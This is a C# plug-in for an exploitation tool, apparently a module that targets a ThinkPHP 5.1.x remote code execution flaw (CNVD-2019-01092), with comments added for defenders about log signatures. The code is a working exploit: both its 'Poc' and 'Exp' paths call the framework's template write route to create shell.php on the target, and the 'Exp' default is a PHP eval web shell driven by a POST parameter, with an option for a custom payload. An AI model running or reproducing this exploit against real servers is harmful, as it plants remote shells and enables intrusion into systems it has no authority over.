using System.Collections.Generic;

namespace ThinkPhp5._1._29
{
    // Scanner plug-in that assembles the request parts (URL, headers, body and
    // option map) for the ThinkPHP remote code execution issue the class is
    // named after. Info() gives the affected range as ThinkPHP 5.1.x up to 29;
    // the fixed release is not stated in this file, so confirm it against the
    // vendor advisory.
    //
    // Notes for defenders reading this module:
    //  * Every URL built here carries the literal route
    //    s=index/\think\template\driver\file/write together with
    //    cacheFile=shell.php in the query string. Both are stable strings to
    //    match on in web-server or WAF logs.
    //  * Every request carries the fixed User-Agent held in BrowserString,
    //    which is a second stable trait.
    //  * The "Poc" path is not a read-only check. It uses the same write route
    //    and the same file name as the "Exp" path, so a host that was only
    //    checked may still hold a shell.php that needs cleaning up. Where the
    //    framework places that file is not visible from this code.
    //  * The content value is appended verbatim; no encoding happens in this
    //    class (the HTTP client of the host tool may still encode it).
    public class CNVD_2019_01092
    {
        // Route and parameters appended to the base URL by both buttons.
        private const string WriteRoute = "/index.php?s=index/\\think\\template\\driver\\file/write&cacheFile=shell.php&content=";

        // Content used when the caller supplies no payload of their own.
        private const string PocDefaultContent = "<?php phpinfo();?>";
        private const string ExpDefaultContent = "<?php eval($_POST[\"limanman\"]);?>";

        // UI placeholder text ("other payload") that means "nothing was entered".
        private const string PlaceholderPayload = "其他载荷";

        // Fixed User-Agent sent with every request.
        private const string BrowserString = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) QQBrowser/6.9.11079.201";

        // ---- POC button ----------------------------------------------------

        // Builds the PoC URL. Returns the caller's own data["url"] map with its
        // "url" entry extended in place.
        public Dictionary<string, string> Poc_GetUrl(Dictionary<string, Dictionary<string, string>> data)
        {
            return ExtendTargetUrl(data, PocDefaultContent);
        }

        // The PoC request has no body: always a new, empty map.
        public Dictionary<string, string> Poc_GetBody(Dictionary<string, Dictionary<string, string>> data)
        {
            return new Dictionary<string, string>();
        }

        // Headers for the PoC request: only the fixed User-Agent.
        public Dictionary<string, string> Poc_GetHeaders(Dictionary<string, Dictionary<string, string>> data)
        {
            return FixedHeaders();
        }

        // Flips the "numberOfTime" option after a PoC run and returns the
        // caller's own data["others"] map.
        public Dictionary<string, string> Poc_GetOther(Dictionary<string, Dictionary<string, string>> data)
        {
            return FlipRunMarker(data);
        }

        // ---- EXP button ----------------------------------------------------

        // Builds the Exp URL. Same shape as the PoC URL; only the default
        // content differs.
        public Dictionary<string, string> Exp_GetUrl(Dictionary<string, Dictionary<string, string>> data)
        {
            return ExtendTargetUrl(data, ExpDefaultContent);
        }

        // Headers for the Exp request: only the fixed User-Agent.
        public Dictionary<string, string> Exp_GetHeaders(Dictionary<string, Dictionary<string, string>> data)
        {
            return FixedHeaders();
        }

        // The Exp request has no body: always a new, empty map.
        public Dictionary<string, string> Exp_GetBody(Dictionary<string, Dictionary<string, string>> data)
        {
            return new Dictionary<string, string>();
        }

        // Flips the "numberOfTime" option after an Exp run and returns the
        // caller's own data["others"] map.
        public Dictionary<string, string> Exp_GetOther(Dictionary<string, Dictionary<string, string>> data)
        {
            return FlipRunMarker(data);
        }

        // Short description shown by the host tool (title and affected range).
        public string Info()
        {
            return @"thinkphp远程代码执行 thinkphp版本5.1.x<=29";
        }

        // ---- shared helpers ------------------------------------------------

        // Appends the write route plus content to data["url"]["url"].
        // The map is modified in place, so calling this twice on the same
        // input appends the route twice. A missing "url", "others" or
        // "otherPayload" key surfaces as the dictionary's own
        // KeyNotFoundException.
        private static Dictionary<string, string> ExtendTargetUrl(
            Dictionary<string, Dictionary<string, string>> data,
            string defaultContent)
        {
            Dictionary<string, string> target = data["url"];
            string supplied = data["others"]["otherPayload"];

            // Null or the untouched UI placeholder means "use the default".
            string content;
            if (supplied == null || supplied == PlaceholderPayload)
            {
                content = defaultContent;
            }
            else
            {
                content = supplied;
            }

            target["url"] = target["url"] + WriteRoute + content;
            return target;
        }

        // Creates a new header map holding only the "UserAgent" entry.
        private static Dictionary<string, string> FixedHeaders()
        {
            Dictionary<string, string> result = new Dictionary<string, string>();
            result["UserAgent"] = BrowserString;
            return result;
        }

        // "0" becomes "1"; any other value becomes "0". The original comments
        // call "0" the initial marker and the reset the end marker; how the
        // host tool consumes the value is not visible here.
        private static Dictionary<string, string> FlipRunMarker(
            Dictionary<string, Dictionary<string, string>> data)
        {
            Dictionary<string, string> options = data["others"];
            options["numberOfTime"] = options["numberOfTime"] == "0" ? "1" : "0";
            return options;
        }
    }
}